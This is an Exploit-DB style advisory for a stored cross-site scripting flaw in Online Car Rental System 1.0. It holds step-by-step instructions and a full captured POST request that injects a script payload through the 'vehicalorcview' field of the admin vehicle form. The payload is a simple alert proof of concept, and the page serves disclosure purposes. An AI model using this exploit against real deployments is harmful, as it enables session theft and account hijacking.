Online Car Rental System 1.0 - Stored Cross Site Scripting

vendor:

Online Car Rental System

by:

Naved Shaikh

8.8

CVSS

HIGH

Stored Cross Site Scripting

CWE

Product Name: Online Car Rental System

Affected Version From: V 1.0

Affected Version To: V 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:online_car_rental_system_using_phpmysql

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10, XAMPP

2021

Online Car Rental System 1.0 – Stored Cross Site Scripting

A stored cross-site scripting vulnerability exists in Online Car Rental System 1.0, which allows an attacker to inject malicious JavaScript code into the application. This can be exploited by an attacker to execute malicious JavaScript code in the context of the application, by sending a specially crafted request to the vulnerable application. This can result in the attacker being able to steal session cookies, hijack user accounts, and perform other malicious activities.

Mitigation:

Input validation should be used to prevent the application from accepting malicious input. The application should also be configured to use a secure HTTP header to prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Online Car Rental System 1.0 - Stored Cross Site Scripting
# Date: 9/2/2021
# Exploit Author: Naved Shaikh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
# Version:  V 1.0
# Tested on Windows 10, XAMPP

Steps:
1) Open http://localhost/car-rental/admin/post-avehical.php 

2) Fill All the details on the page. After submitting, capture the request and change the "vehicalorcview" parameter with our Payload "<script>alert("CAR")</script>" and submit

3) Open the http://localhost/car-rental/ and our Payload excuted.

Request
POST /car-rental/admin/post-avehical.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965
Content-Length: 2724377
Origin: http://localhost
Connection: close
Referer: http://localhost/car-rental/admin/post-avehical.php
Cookie: PHPSESSID=h5ubatunno8u9130c4eq77anf2
Upgrade-Insecure-Requests: 1

-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="vehicletitle"

TestName
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="brandname"

2
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="vehicalorcview"

<script>alert("CAR")</script>
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="priceperday"

200
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="fueltype"

Diesel
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="modelyear"

2008
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="seatingcapacity"

22
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="img1"; filename="Untitled.png"
Content-Type: image/png

PNG

-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream


-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="powerdoorlocks"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="antilockbrakingsys"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="driverairbag"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="passengerairbag"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="centrallocking"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="crashcensor"

1
-----------------------------13786099262839578593645594965
Content-Disposition: form-data; name="submit"


-----------------------------13786099262839578593645594965--